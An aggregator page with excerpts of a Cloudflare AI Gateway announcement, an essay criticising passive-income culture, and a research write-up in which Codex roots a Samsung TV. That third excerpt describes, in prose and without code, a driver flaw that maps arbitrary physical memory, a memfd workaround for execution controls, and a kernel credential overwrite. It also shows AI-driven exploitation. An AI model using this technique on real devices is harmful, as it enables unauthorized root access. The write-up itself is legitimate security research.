You can browse through our model catalog to find the best model for your use case, from open-source models hosted on Cloudflare Workers AI to proprietary models from the major model providers. We’re excited to be expanding access to models from Alibaba Cloud, AssemblyAI, Bytedance, Google, InWorld, MiniMax, OpenAI, Pixverse, Recraft, Runway, and Vidu — who will provide their models through AI Gateway. Notably, we’re expanding our model offerings to include image, video, and speech models so that you can build multimodal applications
Accessing all your models through one API also means you can manage all your AI spend in one place. Most companies today are calling an average of 3.5 models across multiple providers, which means no one provider is able to give you a holistic view of your AI usage. With AI Gateway, you’ll get one centralized place to monitor and manage AI spend.
By including custom metadata with your requests, you can get a breakdown of your costs on the attributes that you care about most, like spend by free vs. paid users, by individual customers, or by specific workflows in your app.
AI Gateway gives you access to models from all the providers through one API. But sometimes you need to run a model you’ve fine-tuned on your own data or one optimized for your specific use case. For that, we are working on letting users bring their own model to Workers AI.
The overwhelming majority of our traffic comes from dedicated instances for Enterprise customers who are running custom models on our platform, and we want to bring this to more customers. To do this, we leverage Replicate’s Cog technology to help you containerize machine learning models.
Cog is designed to be quite simple: all you need to do is write down dependencies in a cog.yaml file, and your inference code in a Python file. Cog abstracts away all the hard things about packaging ML models, such as CUDA dependencies, Python versions, weight loading, etc.
Example of a predict.py file, which has a function to set up the model and a function that runs when you receive an inference request (a prediction):
from cog import BasePredictor, Path, Input
import torch
class Predictor(BasePredictor):
def setup(self):
″“”Load the model into memory to make running multiple predictions efficient”“”
self.net = torch.load(“weights.pth”)
def predict(self,
image: Path = Input(description=“Image to enlarge”),
scale: float = Input(description=“Factor to scale image by”, default=1.5)
) -> Path:
″“”Run a single prediction on the model”“”
# … pre-processing …
output = self.net(input)
# … post-processing …
return output
Then, you can run cog build to build your container image, and push your Cog container to Workers AI. We will deploy and serve the model for you, which you then access through your usual Workers AI APIs.
We’re working on some big projects to be able to bring this to more customers, like customer-facing APIs and wrangler commands so that you can push your own containers, as well as faster cold starts through GPU snapshotting. We’ve been testing this internally with Cloudflare teams and some external customers who are guiding our vision. If you’re interested in being a design partner with us, please reach out! Soon, anyone will be able to package their model and use it through Workers AI.
Using Workers AI models with AI Gateway is particularly powerful if you’re building live agents — where a user’s perception of speed hinges on time to first token or how quickly the agent starts responding, rather than how long the full response takes. Even if total inference is 3 seconds, getting that first token 50ms faster makes the difference between an agent that feels zippy and one that feels sluggish.
Cloudflare’s network of data centers in 330 cities around the world means AI Gateway is positioned close to both users and inference endpoints, minimizing the network time before streaming begins.
Workers AI also hosts open-source models on its public catalog, which now includes large models purpose-built for agents, including Kimi K2.5 and real-time voice models. When you call these Cloudflare-hosted models through AI Gateway, there’s no extra hop over the public Internet since your code and inference run on the same global network, giving your agents the lowest latency possible.
When building agents, speed is not the only factor that users care about — reliability matters too. Every step in an agent workflow depends on the steps before it. Reliable inference is crucial for agents because one call failing can affect the entire downstream chain.
Through AI Gateway, if you’re calling a model that’s available on multiple providers and one provider goes down, we’ll automatically route to another available provider without you having to write any failover logic of your own.
If you’re building long-running agents with Agents SDK, your streaming inference calls are also resilient to disconnects. AI Gateway buffers streaming responses as they’re generated, independently of your agent’s lifetime. If your agent is interrupted mid-inference, it can reconnect to AI Gateway and retrieve the response without having to make a new inference call or paying twice for the same output tokens. Combined with the Agents SDK’s built-in checkpointing, the end user never notices.
The Replicate team has officially joined our AI Platform team, so much so that we don’t even consider ourselves separate teams anymore. We’ve been hard at work on integrations between Replicate and Cloudflare, which include bringing all the Replicate models onto AI Gateway and replatforming the hosted models onto Cloudflare infrastructure. Soon, you’ll be able to access the models you loved on Replicate through AI Gateway, and host the models you deployed on Replicate on Workers AI as well.
To get started, check out our documentation for AI Gateway or Workers AI. Learn more about building agents on Cloudflare through Agents SDK.
...
Read the original on blog.cloudflare.com »
I had coffee last year with a guy - I won’t use his real name - who told me he was “building a business.” I asked what it did. Dropshipping jade face rollers.
I made him say it twice.
He’d found them on Alibaba for $1.20 each, and started selling them through Shopify for $29.99. Never used one himself. Didn’t really know what they were for - something about lymphatic drainage? Reducing puffiness? He said “lymphatic” the way you say a word you’ve only ever read and never heard out loud.
Some guy on YouTube said jade rollers were “trending,” the margins looked insane on paper, so he’d “built” a website with stock photos of a dewy-skinned woman rolling a green rock across her cheekbone and started running Facebook ads at $50 a day. Customers would email asking where their stuff was - shipping from Guangzhou, three to six weeks, sometimes way longer - and he’d copy-paste a response he found on a dropshipping subreddit. He had a Google Doc full of pre-written customer service replies.
Five months in, he was $800 in the hole.
He told me all this like he’d invented the wheel.
I bought him another coffee. I genuinely had no idea what else to do.
Jade Roller Guy has become my go-to example of something that went drastically, terribly wrong with how a whole generation of would-be entrepreneurs thought about work and money. A specific ideology - I’ve been calling it Passive Income Brain - grabbed a huge chunk of the people who were, by temperament and ability, most likely to start real businesses, and it gave them a completely fucked set of priorities.
Somewhere between 2015 and 2022, “passive income” stopped being a boring financial planning term and became, I don’t know how else to put this, a salvation narrative. I mean that literally. There was an eschatology if you want to get nerdy about it. The Rapture was the day your “passive income” exceeded your monthly expenses and you could quit your job forever. People talked about it with that exact energy.
But, of course, the folks making any actual income, of any kind, were the ones selling courses about making passive income. It was an ouroboros. It was an ouroboros that had incorporated in Delaware and was running Facebook ads.
The pitch went something like: you, a sucker, currently trade your time for money. This is what employees do, and employees are suckers. (I’m paraphrasing, but not by much.) Smart people build SYSTEMS. A system is anything that generates revenue without your ongoing involvement. Write an ebook. Build a dropshipping store. Create an online course. Set up affiliate websites.
The specific vehicle doesn’t matter because the important thing isn’t what you build, it’s the structure. You want a machine that generates cash while you sleep, and once you have that machine, you are free.
Free to do what? Sit on a beach, apparently. Every single one of these people wanted to sit on a beach. I’ve never understood this. Have they been to a beach? There’s sand. It gets everywhere. You can sit there for maybe three hours before you want to do literally anything else.
The allure is real. Who doesn’t want money that shows up while you sleep?
I’d fucking love that. I’d love it very much indeed. But “passive income” as an organizing philosophy for your entire business life, for how you think about work, is almost perfectly designed to produce garbage.
When you make “passivity” the thing you’re optimizing for, you stop caring about anything a customer might actually want. Caring is active. Caring takes time. Caring is work.
Giving a shit is, by definition, not passive.
Between 2019 and 2021, roughly 700,000 new Shopify stores opened. The platform went from about a million merchants to 1.7 million in two years. About 90% of those stores failed within their first year. Which is really more a meat grinder, than it is a business model…
We started drowning in a million businesses nobody was actually running. Dropshipping stores with six-week shipping times and customer service that was just copy-pasted templates. Guys who’d put their “brand name” - usually something like ZENITHPRO or AXELVIBE, always in all caps, always vaguely aggressive - on a garlic press identical to four hundred other garlic presses on the same Amazon page. AXELVIBE! For a garlic press!
And the affiliate blogs! Hundreds of thousands of them, pumped full of SEO-optimized reviews of products the authors had never touched, never even seen in person. A fractal of bullshit that technically qualifies as commerce but puts zero dollars of actual value into the world.
Leverage is real; I’m not disputing that. There is a difference between trading hours for dollars and building something that scales. Software does this. Publishing does this. You write a book once, sell it many times, nobody calls that a scam. Fine! That part they got right!
Where it went wrong is that the whole movement confused “build a good product that scales” with “build any mechanism that extracts money without you being involved.” I don’t think that confusion was accidental. I think the confusion was the point. Because if you’re teaching people to build real businesses, you have to sit with hard, boring questions about whether anyone actually wants what you’re selling. But if you’re teaching people to build “passive income streams” you can skip all of that and go straight to the fun tactical shit. How to run Facebook ads, how to set up a Shopify store in a weekend, how to write email sequences that manipulate people into buying things they don’t need.
Nobody talks enough about what the passive income movement did to the content quality of the entire internet. If you’ve tried to google “best [anything]” in the last five years and gotten a wall of nearly identical listicles, all with the same structure (“We tested 47 blenders so you don’t have to!“), all making the same recommendations, all linking to the same Amazon products, you’ve experienced the results.
Those articles weren’t written by people who cared whether you bought a good blender. They were written by people who cared whether you clicked their affiliate link, because that’s what generated passive income, and the incentives made honesty actively counterproductive.
The honest review of blenders is: “most blenders are fine, just get whatever’s on sale, the differences below $100 are basically meaningless.” That review generates zero affiliate revenue. So nobody wrote it.
Instead you got “The Vitamix A3500 is our #1 pick!” with a nice affiliate link, written by someone who has never blended anything in their life. Multiply this across every product category and you start to understand the informational desert we’ve been living in. We broke Google results, at least partly, because an army of passive income seekers had an incentive to flood the internet with plausible-sounding garbage.
I’ve met dozens of smart, capable people who had actual energy, and who spent their entire twenties bouncing between passive income schemes instead of building real skills // real businesses // real careers. The pattern was always the same: six months on a dropshipping store, it fails, pivot to Amazon FBA, that fails, pivot to creating a course about dropshipping (because of course), and then the course doesn’t sell either because by 2021 there were approximately forty thousand courses about dropshipping and the market had been saturated since before they started.
And the whole time they were getting further and further from the thing that actually creates economic value, which is: find a real problem, solve it for real people, care enough to stick around and keep improving. The boring thing. The thing that takes years. The thing that is, to be absolutely clear about this, not passive.
I once saw a guy ask whether he should start a dog walking business and the top response was something like “dog walking isn’t scalable, you should build a dog walking platform instead.” This person liked dogs! He liked walking! He lived in a neighborhood full of busy professionals with dogs!
But the Passive Income Brain thing had gotten so deep into how people talked about business online that “do the simple obvious thing that works for you” was considered naive, and “build a technology platform for an activity you’ve never actually done as a business” was considered smart.
The dog walking guy could have been profitable in a week.
The app guy would have burned through his savings in six months and ended up with a landing page and no users.
By 2020 the passive income world was absolutely crawling with grift: guys posing with rented Lamborghinis in YouTube thumbnails, “digital nomads” whose actual income came entirely from selling the dream of being a digital nomad to other aspiring digital nomads, podcast hosts interviewing each other in an endless circle of mutual promotion where everyone claimed to make $30K/month and nobody could explain what they actually produced. By 2021 or so it started to look like a distributed, socially acceptable MLM. The product was the dream of not working. The customers were people desperate enough to pay for it.
Not everyone in this world was cynical. I genuinely believe that. A lot of the people selling passive income content believed their own pitch. They’d had some real success with a niche site - pulled $3,000/month for a while, it does happen - read the same books everyone else read, figured okay, I’ll teach other people my system. Why not. I would have done the same thing at 24. I’m almost sure of it.
But zoom out and what you had was just an enormous machine converting human ambition into noise. Affiliate spam // dropshipped junk // ebooks about passive income // courses about courses. An entire layer of the internet that was nothing but confident-sounding bullshit produced by people who had optimized for everything except making something worth buying.
The people near the top made money. Everyone else spent months or years chasing a mirage and came out with nothing but a Shopify subscription they forgot to cancel. They thought they’d failed. They hadn’t failed. The system, every system, failed them.
What actually makes money hasn’t changed. You find something people need. You get good at providing it. You charge a fair price and you keep showing up even when it’s tedious and even when you don’t want to. You build relationships over years. You build reputation over years. None of it is passive, and none of it has ever been passive! All of it revolves around giving a shit, day after day, about something specific. I don’t think anyone has ever found a way around that and I don’t think anyone will.
The passive income thing was a fantasy about not having to give a shit.
This is a terrible foundation for pretty much anything.
The affiliate SEO blogs are being slaughtered right now by AI-generated content. The people who spent years producing algorithmically optimized content of no value to humans are getting outcompeted by software that does the exact same thing, faster and cheaper. Facebook ad costs went through the roof and took the dropshipping gold rush with them. The biggest passive income gurus have already pivoted to selling AI courses. The machine keeps running. It just swaps out the brochure.
But I’ve noticed more people talking about what I’d call “give a shit” businesses - people who make furniture, run plumbing companies, write software they actually use themselves. Stuff where the answer to “why does your business exist?” isn’t “to generate passive income for me.” This works a lot better than the laptop-on-the-beach grind.
Jade Roller Guy, if you’re out there: I hope you found something real.
I hope it keeps you busy.
...
Read the original on www.joanwestenberg.com »
This post documents our research into using AI to hack hardware devices. We’d like to acknowledge OpenAI for partnering with us on this project. No TVs were seriously harmed during this research. One may have experienced mild distress from being repeatedly rebooted remotely by an AI.We started with a shell inside the browser application on a Samsung TV, and a fairly simple question: if we gave Codex a reliable way to work against the live device and the matching firmware source, could it take that foothold all the way to root?Codex had to enumerate the target, narrow the reachable attack surface, audit the matching vendor driver source, validate a physical-memory primitive on the live device, adapt its tooling to Samsung’s execution restrictions, and iterate until the browser process became root on a real compromised device.We didn’t provide a bug or an exploit recipe. We provided an environment Codex could actually operate in, and the easiest way to understand it is to look at the pieces separately.KantS2 is Samsung’s internal platform name for the Smart TV firmware used on this device model.The setup looked like this:[1] Browser foothold: we already had code execution inside the browser application’s own security context on the TV, which meant the task was not “get code execution somehow” but “turn browser-app code execution into root.“[2] Controller host: we had a separate machine that could build ARM binaries, host files over HTTP, and reach the shell session that was actually alive on the TV.[3] Shell listener: the target shell was driven through tmux send-keys, which meant Codex had to inject commands into an already-running shell and then recover the results from logs instead of treating the TV like a fresh interactive terminal.[4] Matching source release: we had the KantS2 source tree for the corresponding firmware family, which let Codex audit Samsung’s own kernel-driver code and then test those findings against the live device.[5] Execution constraints: the target required static ARMv7 binaries, and unsigned programs could not simply run from disk because of Samsung Tizen’s Unauthorized Execution Prevention, or UEP.[6] memfd wrapper: to work around UEP, we already had a helper that loaded a program into an anonymous in-memory file descriptor and executed it from memory instead of from a normal file path.With that setup, Codex’s loop was simple: inspect the source and session logs, send commands into the TV through the controller and the tmux-driven shell, read the results back from logs, and, when a helper was needed, build it on the controller, have the TV fetch it, and run it through memfd. A few short prompts made that operating loop explicit:SSH to @. This is the shell listener.Use … wget … use the IP of the server.The goal … is to find a vulnerability in this TV to escalate privilege to root.It is either by device driver or publicly known vulnerabilities …We set the destination and left the route open. We did not point Codex at a driver, suggest physical memory, or mention kernel credentials, so it had to treat the session as a real privilege-escalation hunt rather than a confirmation exercise.The second prompt narrowed the standard:… cross check the source to all vulnerabilities from that day onwards …Make sure to THOROUGHLY check if a vulnerability actually still exists …reachability (must be reachable as the browser user context).Make sure to check for the actual availability of the attack surface in the live system …We raised the bar: the bug had to exist in the source, be present on the device, and be reachable from the browser shell. Codex’s output quickly narrowed into concrete candidates.We then gave Codex the facts that would anchor the rest of the session:That bundle did most of the framing work. The browser identity defined the privilege boundary and later became part of the signature Codex used to recognize the browser process’s kernel credentials in memory. The kernel version narrowed the codebase, the device nodes defined the reachable interfaces, and /proc/cmdline later supplied the memory-layout hints for physical scanning.Codex quickly zeroed in on a set of world-writable ntk* device nodes exposed to the browser shell:Codex focused on that driver family because it was loaded on the device, reachable from the browser shell, and present in the released source tree. Reading the matching ntkdriver sources is also where the Novatek link became clear: the tree is stamped throughout with Novatek Microelectronics identifiers, so these ntk* interfaces were not just opaque device names on the TV, but part of the Novatek stack Samsung had shipped. That gave the session a concrete direction.At one point we had to give Codex a constraint that could easily have derailed the session:/proc/iomem is one of the normal places to reason about physical memory layout, so losing it mattered. Codex responded by pivoting to another source of truth - /proc/cmdline:Those boot parameters were enough to reconstruct the main RAM windows for the later scan.With the field narrowed to ntksys and ntkhdma, Codex audited the matching KantS2 source and found the primitive that made the rest of the session possible./dev/ntksys was a Samsung kernel-driver interface that accepted a physical address and a size from user space, stored those values in a table, and then mapped that physical memory back into the caller’s address space through mmap. That is what we mean here by a physmap primitive: a path that gives user space access to raw physical memory. The operational consequence was straightforward. If the browser shell could use ntksys this way, Codex would not need a kernel code-execution trick. It would only need a reliable kernel data structure to overwrite.From there, the path was no longer a kernel control-flow exploit, but a data-only escalation built on physical-memory access.This is already a serious design error because ntksys is not a benign metadata interface. It is a memory-management interface.The driver interface is built around ST_SYS_MEM_INFO:u32Start and u32Size come directly from user space. Those are the only two values an attacker needs to turn this interface into a raw physmap.SET_MEM_INFO validates the slot, not the physical rangeThe critical write path is in ker_sys.c around line 1158:The driver checks whether the table index is valid. It does not check whether the requested physical range belongs to a kernel-owned buffer, whether it overlaps RAM, whether it crosses privileged regions, or whether the caller should be allowed to map it at all.The corresponding map path is in ker_sys.c around line 1539:vma->vm_pgoff selects the slot, and the slot contents are attacker-controlled. The driver then passes the user-chosen PFN directly to vk_remap_pfn_range. At that point the kernel is no longer enforcing privilege separation for physical memory.This is not the core privilege-escalation bug, but it is useful operationally. It hands unprivileged code a known-good physical address that can be mapped through ntksys to prove the primitive works before touching arbitrary RAM.Codex did not jump directly from source audit to final exploitation. It built a proof chain in stages.First it wrote a small helper to talk to /dev/ntkhdma and ask for the physical address of the device’s DMA (direct memory access) buffer. A DMA buffer is memory the driver uses for direct hardware access, and the key point here was not DMA itself but the fact that the driver was willing to hand an unprivileged process a real physical address. The first preserved success looked like this:That gave Codex a safe, known-good physical page to test against. It then wrote a second helper to answer the more dangerous question: if it registered that physical address through ntksys, could it really map the page into user space and read or write it from the browser shell? The answer was yes:Before that output, the issue was still a source-backed theory; after it, Codex had shown that an unprivileged process on the TV could read and write a chosen physical page. The remaining question was which kernel object to corrupt.The exploit did not come from us. We never told Codex to patch cred, never explained what cred was, and never pointed out that the browser process’s uid=5001 and gid=100 would make a recognizable pattern in memory.That choice followed directly from the primitive it had already proven.For anyone who does not spend time in Linux internals, cred is the kernel structure that stores a process’s identities: user ID, group ID, and related credential fields. If you can overwrite the right cred, you can change who the kernel thinks the process is. Once Codex had arbitrary physical-memory access, the remaining plan became straightforward: scan the RAM windows recovered from /proc/cmdline, look for the browser process’s credential pattern, zero the identity fields, and then launch a shell.The live shell had given Codex the identity values, the source audit had given it the primitive, the early helpers had proven that primitive, and the final exploit connected those pieces without needing any elaborate kernel control-flow trick.By the time we reached the final run, the hard parts were already in place. We had the surface, the primitive, the deployment path, and the exploit. The last human prompt was:yeah okay try to check if it worksCodex pushed the final chain through the controller path, had the TV fetch it, ran it through the in-memory wrapper, and waited for the result. The output was:By that point, the chain had already gone through surface selection, source audit, live validation, PoC development, target-specific build handling, remote deployment, execution under memfd, iterative debugging, and finally the credential overwrite that turned the browser shell into root.In the course of driving Codex to the final destination, it definitely was about to go off-track if we did not steer it back immediately. Here are some of those real interactions:bro, when you overwrite the args count, wouldn’t the loop just go wild?bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that’s your jobbro. the is not the TV, it is where the shell livesbro. what *** you did man? the tv frozeBro what did you do before you just replicate it now? why so hard?Honestly, this makes it even more realistic than we thought. At times, it was a one-shot success, and at other times, you really need to build that real interaction with Codex. This couldn’t have completed if we were treating it like a soulless bug finding and exploit developing machine!What made the session worth documenting was the shape of the loop itself. We set up a control path into a compromised TV, gave it the matching source tree and a way to build and stage code, and from there the work became a repeated cycle of inspection, testing, adjustment, and rerun until the browser foothold turned into root on the device.This experiment is part of a larger exercise. The browser shell wasn’t magically obtained by Codex. We had already exploited the device to get that initial foothold. The goal here was narrower: given a realistic post-exploitation position, could AI take it all the way to root?The next step is obvious (and slightly concerning): let the AI do the whole thing end-to-end. Hopefully it’ll stay trapped inside the TV forever, quietly escalating privileges and watching our sitcoms.
...
Read the original on blog.calif.io »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.